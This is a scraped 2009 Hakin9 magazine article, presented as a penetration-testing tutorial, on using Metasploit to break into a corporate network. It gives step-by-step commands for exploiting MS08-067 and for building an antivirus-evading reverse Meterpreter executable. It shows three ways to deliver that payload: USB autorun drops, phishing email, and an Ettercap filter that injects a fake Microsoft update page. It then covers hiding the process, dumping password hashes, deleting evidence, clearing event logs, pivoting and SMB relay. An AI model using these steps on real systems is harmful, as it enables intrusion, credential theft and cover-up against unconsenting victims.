SlideShare une entreprise Scribd logo
1  sur  10
Télécharger pour lire hors ligne
ATTACK
                                  Metasploit
          STEPHEN ARGENT




                                  Alternate Uses for
                                  a Penetration Test
Difficulty

                                  The Metasploit Framework is a program and subproject
                                  developed by Metasploit LLC. It was initially created in 2003 in the
                                  Perl programming language, but was later completely re-written
                                  in the Ruby Programming Language.




                                  A
                                           s of the most recent release (3.2), released                Metasploit has a few distinct advantages for
                                           under the BSD licensing scheme (to                     penetration testers. One of them is that you can
                                           make it truly Open Source, as opposed                  use Metasploit to test an exploit (whether it's your
                                  to its previous Metasploit License which made it                own or someone else's) on all the machines on a
                                  partially Open Source).                                         network simultaneously, and have it automatically
                                       script kiddies or Black Hats to break into                 exploit and gain you an Administrative shell
                                  systems. Typically, a vulnerability researcher                  on each system. You can also feed it results
                                  would have to go through the cycle of Discovery                 from other programs (such as Nmap or Nessus –
                                  >Disclosure>Analysis>Exploit Development>Testin                 usage instructions for these can be found on the
                                  g>Release.                                                      vendor website, or at http://greyhat-security.com/ )
                                       However, since the release of Metasploit,                  and use that to target only specific services in a
                                  exploit development is now quite a simple                       network wide exploit session. It also simplifies the
                                  process that even an amateur coder can                          job of a penetration tester in the sense that they
                                  accomplish. It also serves as a development                     are able to start up Metasploit, leave it running
                                  platform for payloads (the code executed after                  by itself in the background, and proceed to
                                  an exploit has successfully been run), payload                  attempt other Network Penetration Tests. A distinct
                                  encoders (to obscure data so that Intrusion                     advantage that is good for a quick preliminary
                                  Detection Systems [IDS] and Intrusion Protecion                 vulnerability assessment is Metasploit's ability to
                                  Systems [IPS] don't pick up and block the                       integrate with Nmap to perform an action known
WHAT YOU WILL
LEARN...                          exploit), and various other tools. The Metasploit               as Autopwning (read more about it below).
                                  Project also contains a NOOP Code Database                           Additionally, if a compromised box has two or
Basics of how to use Metasploit
                                  (set of Assembly language instructions for the                  more separate subnets or NIC's (Network Interface
How to generate payloads into
executables                       processor).                                                     Cards), then the Penetration Tester can add a
Basic & Advanced use of the
Meterpreter Module
                                   About the Article
WHAT YOU SHOULD                    You've probably heard a lot of talk about Metasploit over the years: About how it can speed up the results of
KNOW...                            exploitation. It is a great tool for Penetration testers. It makes their job of exploitation and post-exploitation a lot
                                   easier, and a lot faster. However, coverage on how to use Metasploit is not always readily available. There are
Your way around Linux
                                   a few lesser known features of Metasploit which I would like to show you. The aim of this article is to teach you
Basic knowledge of Networking      what the Metasploit project is, the basics of how to use it, and an example of a lesser known feature: how to use
and NAT
                                   Metasploit to tunnel from inside a corporate network when an external firewall is impenetrable, and then how to
Knowledge of how exploits          exploit the internal network from there. Curious? Read on.
operate will be useful


24   HAKIN9 2/2009
METASPLOIT ALTERNATE USES FOR A PENETRATION TEST


tunnel through this box via Metasploit, and          most damage is done, and this is where            BackTrack 3 is because it has the correct
is therefore able to interact with or exploit        Meterpreter becomes quite handy.                  Ruby Libraries. The most updated Ruby
the machines on the separate subnet which            Meterpreter aims to avoid HIDS (Host              Library (except for the CVS snapshot) isn't
the Penetration Tester could not initially           Intrusion Detection Systems) by injecting         completely compatible with Metasploit.
access. Aside from Metasploit's sheer power          itself into the running process, as well as       First, take your copy of BackTrack, and go
and ease of use, it also allows Forensic             providing the attacker with a platform on         to:
Avoidance tools and a number of other IDS            which further scripts can be coded and                K menu>Backtrack>Penetration>Fram
evasion techniques to be executed. The               launched. It is an injected attack platform. It   ework Version 3>Framework3-MsfC (see
3.0 branch of the development also allows            also supports port forwarding in a manner         Figure 1).
developers to code their own plug-ins,               similar to SSH. The MSF Project also has              This will bring up the main Metasploit
allowing for an unlimited number of options          support for database integration, so it can       console prompt. Once this is done, you
(limited only by creativity and personal ability).   output and interact with various databases,       have many options. The first step (after
      The Metasploit Framework has a                 such as Postgres or SQLite.                       scanning your target system for open
number of different interfaces which a                                                                 ports/services) is to show the available
user can choose to interact with. The                How do you                                        exploits:
command line interface is the interface              work metasploit?
of choice for most Linux users, due to               Metasploit is simple to use – as was              show exploits
its simplicity and light-weight nature. It is        mentioned before, it is designed with
operated through a series of commands.               ease-of-use in mind to aid Penetration            This will bring up a list of all of them. The list
It allows the user to: choose an exploit and         Testers. It functions in the following way;       will look similar as shown in Figure 2.
a payload, show options for both of these,           you gather info about the target (ports,               For this example, we will choose the
configure options for both of these, choose          services, etc.), decide on a vulnerable           recent Microsoft MS08_067 exploit. To
a platform, and launch the exploit. The              service, select the exploit, fill in a few        select it, you type use, and the name of the
Web interface is the UI of choice for most           options, select a payload, fill in options        exploit as displayed on the left:
Windows users, as the separate command               there as well, and then launch the exploit. I
line isn't always guaranteed to be stable            will walk you through a brief demo, just so       use windows/smb/ms08_067_netapi
– the web interface contains a built-in              you can get familiar with the basics of the
command line, as well as a graphical                 MSF, then you can work at your own pace.          This will select that desired exploit. Now, we
exploitation option. This can be started by          I will be taking you through this demo in         need to take a look at the options (you can
going to Start Menu>Programs>Metasploit              BackTrack 3 (which is what Hakin.9 Live           also see the vulnerable systems available
Framework>MSFWeb, and the firing up your             is based on), so go ahead and download            with the show targets command – this is
web browser and going to http://127.0.0.1:           that if you don't already have it – http:         not required for this exploit however):
55555. The MSF (Metasploit Framework)                //www.remote-exploit.org/backtrack_
GUI is also a popular option for Windows             download.html. The reason for using               show options
users, as it feels more like a conventional
program than a command line, and is what               Listing 1. Kerio Firewall 2.1.4 Authentication Packet Overflow exploit code
most Windows users are comfortable with.
There is also a Metasploit daemon, which is            connect
                                                       print_status("Trying target #{target.name}...")
a Metasploit command line tool that listens            sploit = make_nops(4468) + payload.encoded
for, and interacts with, remote connections.           sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')
      The MSF focuses on simplicity for                sock.put(sploit)
                                                       sock.get_once(-1, 3)
the Penetration Tester. For example, the
                                                       handler
following code is from the body of the                 disconnect
Kerio Firewall 2.1.4 Authentication Packet
Overflow exploit (see Listing 1).
      A powerful feature of the MSF that
simplifies the post-exploitation process is
the Meterpreter module, which is injected
directly into a running process on the
exploited system, aiding in IDS evasion,
and assisting in avoidance of detection
by the user. In a penetration test, a lot of
focus is placed on information gathering
and exploitation, not a lot of importance is
given to the power of the post-exploitation
phase. It is during this period that the             Figure 1. Opening the Metasploit Console

                                                                                                                                    2/2009 HAKIN9     25
ATTACK
Just before we go setting options, we also    also a number of options for you to explore       features. First, let's take a look at autopwn.
need to choose a payload (see Figures 3,4).   on your own; things such as encoding              This feature is relatively new. It allows you
                                              payloads to avoid Anti-Virus and IDS,             to automate exploitation on a large scale,
show payloads                                 constructing your own exploits, payload           based on a self-executed Nmap scan.
set payload windows/shell/bind_tcp            generated executables, automated post-            Basically, Metasploit takes the results of
show options                                  exploitation scripts, and numerous other          a scan and puts them into a database
                                              tricks of the trade. Lets take a look at some     (meaning that only the parameters you
And finally, we are required to set the       of them.                                          specify in the Nmap scan will be added to
options. In this case, only the RHOST value                                                     this database). Then Metasploit analyses
is needed (the target/remote host). Then      Metasploit – is it really                         the results. It selects appropriate exploits
type exploit :                                useful in a penetration test?                     for the operating systems and services
                                              Aside from the obvious reasons for it being       encountered. It automatically sets the
set RHOST 192.168.1.3                         useful in a penetration test (fast exploitation   variables, and gives you as many shells as
exploit                                       of large scale hosts, interoperability            it can possibly obtain on as many systems
                                              and integration with other software,              as it can exploit. Now, some may call this
Those are the basic usage steps behind        customisable and user-created plugins),           being a script kiddie, and in essence it is,
a simple Metasploit exploitation. There are   Metasploit does have a few other useful           but it's more than just that. It's being smart,
                                                                                                in the sense that if time is of the essence,
                                                                                                you can use this to your advantage. For
                                                                                                example, lets say there are two penetration
                                                                                                testers going for the same job, and each is
                                                                                                put to the test to see who can find the most
                                                                                                vulnerabilities in a set amount of time (say
                                                                                                45 minutes). One decides to use autopwn,
                                                                                                while the other starts fuzzing applications,
                                                                                                brute forcing passwords, looking for poorly
                                                                                                configured passwords, etc. Who do you
                                                                                                think will come out on top? The one who
                                                                                                used autopwn can start it running, walk
                                                                                                away, grab a coffee, come back, and quite
                                                                                                realistically have 50 or more shells on his
                                                                                                PC (if the company isn't already secured).
                                                                                                He will get the job, at which point he will be
                                                                                                able to perform a more detailed analysis.
                                                                                                To experiment with autopwn in BackTrack 3,
                                                                                                go to a terminal and type:

                                                                                                cd /pentest/fast-track && fast-
Figure 2. Metasploit Payloads                                                                                           track.py -i


                                                                                                Choose option 2, then option 3, then option
                                                                                                1. Enter a regular nmap scan on a range
                                                                                                of IP's (excluding the nmap command,
                                                                                                and just specifying the options), and press
                                                                                                enter:

                                                                                                -sS -sV -T 3 -P0 -O 192.168.1.1-254


                                                                                                We will now examine some other features
                                                                                                and tricks of the MSF.

                                                                                                Using Metasploit
                                                                                                to aid in bypassing
                                                                                                corporate firewalls
                                                                                                Quite often, penetration testers will do what
Figure 3. Setting Payload Options                                                               is known as a black box penetration test;

26   HAKIN9 2/2009
ATTACK
they know nothing about the target, and          the Meterpreter process with a Windows            remotely, replace all LAN addresses with
they have to get into the company system.        System process to avoid further detection,        your WAN address, and make sure that
Quite often, they can't get physical access      gather more info about the company and            your router and firewall a appropriately
to the building due to heavy exterior            the internal network, and then route through      forwarding all requests to the listening
security, and can't bypass the firewall          the exploited box to attack the internal          machine. Ideally, you'll be DMZ'ing all Port
because it has been secured well. It's a         server. Shall we begin?                           5555 (in this case) traffic to your listening
heavy-duty system. At this stage, there               Just as an initial note, I advise you only   host. We will be using BackTrack on Linux
are numerous options: weak passwords,            do this on your own LAN at home, or in a          as our intrusion system, and Windows as
session hijacking, etc. In some cases,           specifically designed Penetration Testing         our target (because most employees use
none of these are an option.At this stage,       Lab for your first time, until you get used       Windows in the workplace).
penetration testers often revert to social       to it and familiar with Meterpreter and the           First up, fire up BackTrack (or your
engineering, which – if successful – may or      Metasploit interface. If you are doing this       equivalent Linux system). We will need to
may not get them the required credentials.
So – how can Metasploit be of assistance
to us in this scenario? Proceed to find
out. You may also encounter a client-side
firewall (I.e., one on the targets computers),
however, in a corporate environment this is
not always the case. If so, you may need to
     Most corporate firewalls are effective
because they are configured to block all
incoming requests that don't fit a certain
autorized criteria, and any incoming
requests that originated without an initial
outgoing request. The downside to these
firewalls is that they are often configured
to not block any outgoing requests (to
enable a productive work environment), or
configured to not block outgoing requests
on certain ports (such as 21/FTP, 22/SSH,
80/HTTP, 8080/HTTProxy, etc.) Using
Metasploit, we can take advantage of this
weakness. Now, you might be wondering
how we can get inside, if the only things
that can get through are outgoing requests
(such as the user browsing the Internet, or
a remote Network Attached Storage [NAS]          Figure 4. Checking Payload Options
that the company interacts with). It's simple.
We make the user request a connection to
us. Not by asking them, but by combining
Metasploit and a little social engineering,
or brief physical access. This is possible
because Metasploit's payloads aren't just
available for use in exploitation.. They can
also be compiled into binary files (in the
form of either Windows .exe's, or Linux
binaries). And now, thanks do the MSF
3.2 release, they can be encoded so they
avoid Anti-Virus detection. We will be taking
advantage of the binary generation as well
as the encoder. Combining Metasploit with
the power of the Meterpreter (Metasploit's
powerful post-exploitation shell), and using
the outgoing protocol weakness in the
firewall we can get into the company. Once
we are past the firewall, we will merge          Figure 5. Checking the Password Dump

28   HAKIN9 2/2009
METASPLOIT ALTERNATE USES FOR A PENETRATION TEST


update Metasploit to the latest version.            LPORT=5555 R | ./msfencode -b '' -t         this is a reverse connection, and we need
Open up the console, and type the                                      exe -o output.exe        something to accept it on our end. In the
following commands:                                                                             same window start up the MSF console
                                                 Now, let's analyze this command. The           and then set up the listener (see Listing 2).
bt ~ # cd /pentest/exploits/                     first part tells msfpayload to use the               After this, you will need to convince
                        framework3/              Meterpreter Reverse TCP payload, with          the person to run it. We will cover that in a
bt ~ # svn co http://metasploit.com/             the Local Host of 192.168.1.2, and the         minute, but just for argument sake this is
   svn/framework3/trunk/                         Local Port of 5555. This is where any          what it will look like once they have run as
                                                 machine that runs the executable will try to   shown in Listing 3.
This should have updated Metasploit              connect. This is output as Raw shellcode             This is what you'll see once they've run
with the latest version. Now, we will need       (as indicated by the 'R') and then piped       the program. This will eventually be your
to generate our executable to use in this        through to msfencode. We specified -b          little control terminal over the entire network.
Pentest. We will be using the Reverse            ''; no bad characters to avoid (though         There are a number of ways of get someone
TCP Meterpreter payload (windows/                you can include characters as well, for        on the inside to run it. First you could
meterepreter/reverse_tcp), which gets            example: -b 'x00xff'). We specify            purchase a cheap flash drive, copy the file
the payload (our generated executable)           the type of output as an executable, and       as a hidden file onto the flash drive, and
to connect to our listening host from the        the output file as output.exe – simple,        cause it to autorun as soon as it's inserted
inside. Type this in the same console:           yet effective. This executable is our little   into a computer. You could then conveniently
                                                 reverse connector that we will need to get     drop this flash drive outside the building, or
./msfpayload windows/meterpreter/                inside of the company. Put it aside for the    a specific employees locker, where curiosity
   reverse_tcp LHOST=192.168.1.2                 moment. We need to set up a listener since     will take over. Someone will plug it into the
                                                                                                computer to test it out. It will run and you will
                                                                                                get the command session. A second idea
  Listing 2. Setting up the Exploit Listener
                                                                                                could be to attach it to an email. Use a bit of
  bt ~ # ./msfconsole                                                                           social engineering on a targeted employee
  msf > use exploit/multi/handler
                                                                                                to convince them to run the program.
  msf > set payload windows/meterpreter/reverse_tcp
  msf > set LHOST 192.168.1.2                                                                         A third option would be to use a form
  msf > set LPORT 5555                                                                          of MiTM (Man in the Middle) attack to
  msf > show options                                                                            add frames into all web pages, informing
  msf > exploit
                                                                                                people that they need to perform an official
  Listing 3. Exploit Listener Output                                                            update of their system by clicking on the
                                                                                                link, which will download your program to
  msf   exploit(handler) > exploit
                                                                                                run. For this section, we will be working
  [*]   Started reverse handler
  [*]   Starting the payload handler...                                                         with Ettercap and some Ettercap filters
  [*]   Transmitting intermediate stager for over-sized stage...(191 bytes)                     – you can read a full tutorial on how to
  [*]   Sending stage (2650 bytes)                                                              use Ettercap for MiTM attacks in one of
  [*]   Sleeping before handling stage...
  [*]   Uploading DLL (75787 bytes)...
                                                                                                my previous articles in Hakin9. Initially, we'll
  [*]   Upload completed.                                                                       need to start a web server on K Menu>
  [*]   Meterpreter session 1 opened (192.168.1.2:5555 -> 192.168.1.3:1138)                     Services>HTTPD>Start HTTPD CGI. Now,
                                                                                                we will need to copy the output.exe file we
  meterpreter >
                                                                                                generated before to the root directory of the
  Listing 4. Ettercap Web Filter Code                                                           web server. Open up a terminal, and type:

  if (ip.proto == TCP && tcp.dst == 80) {
      if (search(DATA.data, "Accept-Encoding")) {
                                                                                                bt ~ # cp /pentest/exploits/
             replace("Accept-Encoding", "Accept-Nothing!");                                        framework3/output.exe /var/www/
        }                                                                                          htdocs/output.exe
  }
  if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, "<title>")) {                                                     Now, we will need to make the Ettercap filter
             replace("</title>", "</title><form action="http://192.168.1.3/output.exe"          to actually add the frame to the webpage.
  method="link"><img src="http://192.168.1.3/security.png"><INPUT TYPE=submit                   In that same terminal, type:
                        value="Download Security Update"></form><html><body><h10>
  Your PC is vulnerable and needs to be updated. The Microsoft Bulletin ID is MS08_067.
  Please update by downloading the program and running the update.                              bt ~ # kedit web.filter
  For more information, see <a href=http://www.microsoft.com/technet/security/bulletin/
                        MS08-067.mspx”>here</a></h10></body></html>");
                                                                                                And in the page that pops up, copy and
             msg("html injected");
        }}                                                                                      paste as shown in Listing 4 (changing the
                                                                                                appropriate variables).

                                                                                                                             2/2009 HAKIN9    29
ATTACK
    For the security.png file, consider using     download – It's a pretty obvious one,               use this to execute a program you
one like http://tinyurl.com/hakin9shield – it's   but it allows you to download remote                uploaded, or interact with a windows
large, professional, and makes sure it's          files to your local PC Basic usage is               Cmd shell on the local system, etc.
seen. However, it may also be an idea to          this:
resize it so it's not too overbearing. Adjust                                                     Typical usage is:
the file to suit your situation, and click Save   download [options] src1 src2 src3 ...
and then close Kedit . In the same terminal,                             destination              •   Usage: execute -f file [options]
we will now turn that filter into a file usable   OPTIONS:
by Ettercap, then start up Ettercap.              -r          Download recursively.               OPTIONS:

bt ~ # etterfilter web.filter web.ef              For example, we change to a directory (C:       •   -H – Create the process hidden from
bt ~ # ettercap -T -q -F web.ef                   Documents and SettingsFail User) and             view
     -M arp:remote /192.168.1.1-255/ -P           then download their My Documents folder:        •   -a <opt> – The arguments to pass to
                        autoadd                                                                       the command
                                                  •    download -r My Documents /home/            •   -c – Channelized I/O (required for
Provided you have Metasploit's exploit                 root/Documents                                 interaction)
handler listening, all you have to do is wait     •    upload – Upload is the same basic          •   -d <opt> – The dummy executable to
until someone falls for your trick, and you'll         idea, just in reverse (upload instead of       launch when using -m
have a Meterpreter session. After that, if             download). Usage is exactly the same       •   -f <opt> – The executable command
you want to make it seem realistic, you can            format.                                        to run
cancel Ettercap with q. If you can't get it       •    execute – This will be a useful            •   -h – Help menu
working for some reason, I upload a copy               command to remember. It allows you to      •   -i – Interact with the process after
of it to my site: http://greyhat-security.com/         execute commands on the system and             creating it
html.ef – keep in mind, you'll need to have            also to interact with them. You could      •   -m – Execute from memory
the same variables as I did for it to work.
     Now, we will take a look at a few possible
options once you have this command
session. First up, you'll want to hide the
process, so there's no obvious additional
programs running. Type ps to see a list           Figure 6. Deleting Evidence
of processes. You should see something
similar to the following (see Listing 5).
     As you can see, our software
(output.exe) is still running. We will use the
migrate command to merge out process
with svchost.exe, which runs a PID of 716.
Type the following command:

meterpreter > migrate 716


You should see something like this:

[*] Migrating to 716...
[*] Migration completed successfully.


Type ps to confirm:

meterpreter > ps


Process list (see Listing 6)
    As you can see, our process has all but
disappeared. Now that we are a little less
obviously in their system, we have more time
to complete our operations. Basic operation
commands can be seen by typing help.
Some important ones that you may use:             Figure 7. Routing a scan through the client

30   HAKIN9 2/2009
METASPLOIT ALTERNATE USES FOR A PENETRATION TEST


                                                                                         •   -t – Execute process with currently
Listing 5. Process List Before Migration                                                     impersonated thread token
    240    output.exe      C:Documents and SettingsFail UserMy Documentsoutput.exe
    404    smss.exe        SystemRootSystem32smss.exe                                 For example, to execute a command
    484    winlogon.exe    ??C:WINDOWSsystem32winlogon.exe                          prompt hidden from their view, and interact
    528    services.exe    C:WINDOWSsystem32services.exe
                                                                                         with it, type:
    540    lsass.exe       C:WINDOWSsystem32lsass.exe
    716    svchost.exe     C:WINDOWSsystem32svchost.exe
    768    svchost.exe     C:WINDOWSSystem32svchost.exe                               execute -f cmd.exe -c -H -i
    1156   Explorer.EXE    C:WINDOWSExplorer.EXE
    1184   spoolsv.exe     C:WINDOWSsystem32spoolsv.exe
    1316   RUNDLL32.EXE    C:WINDOWSSystem32RUNDLL32.EXE
                                                                                         •   run – This can be used to run ruby
    1324   ctfmon.exe      C:WINDOWSSystem32ctfmon.exe                                    scripts, such as the following from
    1332   msmsgs.exe      C:Program FilesMessengermsmsgs.exe                             Chris Gates:
    1584   nvsvc32.exe     C:WINDOWSSystem32nvsvc32.exe
    1928   WinVNC.exe      C:Program FilesTightVNCWinVNC.exe
                                                                                         print_line("Clearing the Security Event
Listing 6. Process List After Migration                                                  Log, it will leave a 517 eventn")
                                                                                         log = client.sys.eventlog.open('secur
============
                                                                                                                 ity')

    PID    Name             Path                                                         •   hashdump – This can only be used if
    ---    ----             ----
                                                                                             you type use priv beforehand. When
    404    smss.exe        SystemRootSystem32smss.exe                                     you do, and then you type hashdump,
    460    csrss.exe       ??C:WINDOWSsystem32csrss.exe                                 you will get a dump of all the local user
    484    winlogon.exe    ??C:WINDOWSsystem32winlogon.exe                              account passwords, which you can
    528    services.exe    C:WINDOWSsystem32services.exe
                                                                                             then crack with Ophcrack or a similar
    540    lsass.exe       C:WINDOWSsystem32lsass.exe
    716    svchost.exe     C:WINDOWSsystem32svchost.exe                                   program.
    768    svchost.exe     C:WINDOWSSystem32svchost.exe
    908    svchost.exe     C:WINDOWSSystem32svchost.exe
                                                                                         Another idea could be to generate a
    936    svchost.exe     C:WINDOWSSystem32svchost.exe
    1156   Explorer.EXE    C:WINDOWSExplorer.EXE
                                                                                         reverse-vnc executable in the same way we
    1184   spoolsv.exe     C:WINDOWSsystem32spoolsv.exe                               did with Meterpreter. Set up another listener,
    1316   RUNDLL32.EXE    C:WINDOWSSystem32RUNDLL32.EXE                              upload the generated payload, and get it
    1324   ctfmon.exe      C:WINDOWSSystem32ctfmon.exe
                                                                                         to execute remotely using the Meterpreter
    1332   msmsgs.exe      C:Program FilesMessengermsmsgs.exe
    1584   nvsvc32.exe     C:WINDOWSSystem32nvsvc32.exe                               session. This will give us a VNC on the
    1928   WinVNC.exe      C:Program FilesTightVNCWinVNC.exe                          remote PC.
                                                                                             Another handy trick is to use the
Listing 7. Checking the Route Table
                                                                                         exploited PC to pivot through, in order
meterpreter > route                                                                      to exploit other PC's inside the network
   Subnet           Netmask          Gateway                                             that are not accessible externally (such
    ------           -------          -------
                                                                                         as the internal server). To do this in your
    0.0.0.0          0.0.0.0          192.168.1.1
    127.0.0.0        255.0.0.0        127.0.0.1                                          current session, you'll need to do a few
    192.168.1.0      255.255.255.0    192.168.1.3                                        things. First off, you'll need to type route
    192.168.1.3      255.255.255.255 127.0.0.1                                           to see the current network configuration.
    192.168.1.255    255.255.255.255 192.168.1.3
    224.0.0.0        240.0.0.0        192.168.1.3
                                                                                         You should get an output like as shown in
    255.255.255.255 255.255.255.255 192.168.1.3                                          Listing 7.
                                                                                             Then we'll need to take note of the local
Listing 8. Adding a New Route                                                            subnet 192.168.1.0, and then background
meterpreter > ^Z                                                                         the meterpreter session by pressing
Background session 1? [y/N] y                                                            [Ctrl]+[Z] and then typing y :
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
msf exploit(handler) > route print
                                                                                         meterpreter > ^Z
                                                                                         Background session 1? [y/N]        y
Active Routing Table
====================
                                                                                         This will enable us to add a local route for
   Subnet                 Netmask           Gateway                                      metasploit. We will now use the route add
   ------                 -------           -------                                      command, in the format:
   192.168.1.0            255.255.255.0     Session 1

                                                                                         route add <subnet><netmask><session-id>


                                                                                                                    2/2009 HAKIN9    31
ATTACK
We get:                                              meterpreter>download 127.0.0.1.pwdump            an SMB server. First discovered in 2001,
                                                     meterpreter>execute -f cmd.exe -c -H -i          this wasn't patched until November 2008.
msf exploit(handler) > route add                     C:Documents and SettingsFail User             Fire up your MSF console – on Linux, this
      192.168.1.0 255.255.255.0 1                      My Documents>del 127.*                         exploit uses a restricted port, so you will
                                                     C:Documents and SettingsFail User             have to run it as root. Then type as shown
Then view with:                                          My Documents>del 2008*                       in Listing 9.
                                                                                                           Now, e-mail a targeted user (preferably
msf exploit(handler) > route print                   Now, we simply need to execute our               an administrative user) with an HTML email,
                                                     Nmap scan, and after that, analyse the           referencing an image in the following way:
Active Routing Table                                 vulnerabilities, and exploit the server the
====================                                 same way you would any other host. For           <img src=//192.168.1.2/logo.jpg>
       Subnet     Netmask      Gateway               this scan, I did something very quick and
     ------     -------        -------               basic, but you can specify it however you        Provided that user has administrative
 192.168.1.0      255.255.255.0      Session 1       like (see Figure 7):                             authentication, your MSF will authenticate
                                                                                                      with it and receive a shell session in
We can then do an Nmap scan (still from the          msf exploit (handler) > nmap -P0                 which you can perform exactly the same
backgrounded session console) to find more                                    192.168.1.1             actions as the previous shell. This is just
vulnerabilities, hosts, etc., and then proceed                                                        an alternative method of bypassing certain
to exploit further hosts with Metasploit and         Exploiting SMB with                              outside restrictions.
interact with those sessions. Let's take a look      Metasploit from a
at a few of these in action (see Figure 5).          Penetration Testing                              Conclusion
     To start, we'll do a dump of local              Viewpoint                                        It can be seen that social engineering
passwords. Go grab a copy of fgdump                  Sometimes, sending a program or                  plays a huge role in some penetration
from http://www.foofus.net/fizzgig/fgdump/           dropping a flash drive is a little too obvious   tests, and when combined with the power
downloads.htm and unarchive that to your             for a company to fall for. In this case a        of certain exploitation frameworks, can be
local Metasploit Directory. Now, upload it,          simple e-mail might be the easiest solution.     very effective in levering into a company
and execute it, using the technicues you             This little trick uses the e-mail to reference   during a penetration tests. This article is
learnt before. Then, we will download a              an image that does not exist on the PC           designed to get you thinking a little bit more
copy of the passwords, and delete it from            you are using, where Metasploit is listening     about alternative means of entry during a
the remote PC (see Figure 6):                        and waiting to inject or bind a shell.           penetration test, and hopefully it has done
                                                     This is due to a vulnerability where any         just that. The best defense is to stay up to
meterpreter>upload fgdump.exe                        Windows PC (that hasn't been updated)            date with patches, and to put all your staff
                          fgdump.exe                 will automatically look up and attempt to        through basic security training. Doing this
meterpreter>execute -f fgdump.exe -i -H              authenticate any image or file located on        will greatly alleviate the risk of someone
                                                                                                      performing a successful attack using these
                                                                                                      methods.
 On the 'Net
 •     http://en.wikipedia.org/wiki/Metasploit                                                        Thanks
 •     http://metasploit.com                                                                          I'd also like to take the time to thank a
 •     http://en.wikipedia.org/wiki/SMBRelay                                                          few people and groups who helped with
 •     http://microsoft.com/technet/sysinternals/utilities/psexec.mspx                                various testing and discussions over the
 •     Syngress Press – Metasploit Toolkit for Penetration Testing, Exploit Development, and
                                                                                                      course of this article: Aneta Zysk, Tim
       Vulnerability Research – Copyright 2007 by Elsevier, Inc. All rights reserved.
                                                                                                      Goddard, Stuart Burfield, and Harley
                                                                                                      Cummins for their willingness to participate
     Listing 9. Setting up an SMB Relay Attack                                                        with remote testing. H.D. Moore and the
                                                                                                      Metasploit team for providing such a useful
     msf > use exploit/windows/smb/smb_relay
     msf > info       <--- just for a little bit more information about the attack                    tool. Jesse for his motivation. And finally, the
     msf exploit(smb_relay) > set srvhost 192.168.1.2                                                 guys from TRH for all your help in providing
     srvhost => 192.168.1.2                                                                           remote shells where needed (for testing
     msf exploit(smb_relay) > set lhost 192.168.1.2
                                                                                                      purposes).
     lhost => 192.168.1.2
     msf exploit(smb_relay) > set payload windows/meterpreter/bind_tcp
     payload => windows/meterpreter/bind_tcp
     msf exploit(smb_relay) > exploit                                                                 Stephen Argent
     [*] Exploit running as background job.                                                           Stephen is currently working a number of jobs, while
                                                                                                      studying to obtain his Advanced Diploma in Network
     [*] Started bind handler
                                                                                                      Security. Stephen runs http://greyhat-security.com as
     [*] Server started.                                                                              a hobby, and can be contacted at stephen@greyhat-
                                                                                                      security.com


32    HAKIN9 2/2009
24 33 -_metasploit

Contenu connexe

En vedette

La catedral y el bazar
La catedral y el bazarLa catedral y el bazar
La catedral y el bazarwozgeass
 
Revista Python entre todos No.1
Revista Python entre todos No.1Revista Python entre todos No.1
Revista Python entre todos No.1wozgeass
 
Vista sucks
Vista sucksVista sucks
Vista suckswozgeass
 
Programacion en python_1
Programacion en python_1Programacion en python_1
Programacion en python_1wozgeass
 
Revista Linux Latino No.1
Revista Linux Latino No.1Revista Linux Latino No.1
Revista Linux Latino No.1wozgeass
 
Aztli diseño bueno
Aztli diseño buenoAztli diseño bueno
Aztli diseño buenowozgeass
 
Cultivandolanoosfera
CultivandolanoosferaCultivandolanoosfera
Cultivandolanoosferawozgeass
 
Programacion en python_3
Programacion en python_3Programacion en python_3
Programacion en python_3wozgeass
 
Metasploit @ 2010 Utah Open Source Conference
Metasploit @ 2010 Utah Open Source ConferenceMetasploit @ 2010 Utah Open Source Conference
Metasploit @ 2010 Utah Open Source ConferenceJason Wood
 

En vedette (9)

La catedral y el bazar
La catedral y el bazarLa catedral y el bazar
La catedral y el bazar
 
Revista Python entre todos No.1
Revista Python entre todos No.1Revista Python entre todos No.1
Revista Python entre todos No.1
 
Vista sucks
Vista sucksVista sucks
Vista sucks
 
Programacion en python_1
Programacion en python_1Programacion en python_1
Programacion en python_1
 
Revista Linux Latino No.1
Revista Linux Latino No.1Revista Linux Latino No.1
Revista Linux Latino No.1
 
Aztli diseño bueno
Aztli diseño buenoAztli diseño bueno
Aztli diseño bueno
 
Cultivandolanoosfera
CultivandolanoosferaCultivandolanoosfera
Cultivandolanoosfera
 
Programacion en python_3
Programacion en python_3Programacion en python_3
Programacion en python_3
 
Metasploit @ 2010 Utah Open Source Conference
Metasploit @ 2010 Utah Open Source ConferenceMetasploit @ 2010 Utah Open Source Conference
Metasploit @ 2010 Utah Open Source Conference
 

Similaire à 24 33 -_metasploit

[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal PanchmahalkarPrajwal Panchmahalkar
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Meta sploit (cyber security)
Meta sploit (cyber security)  Meta sploit (cyber security)
Meta sploit (cyber security) Rajal Patel
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploitGTU
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTDevil's Cafe
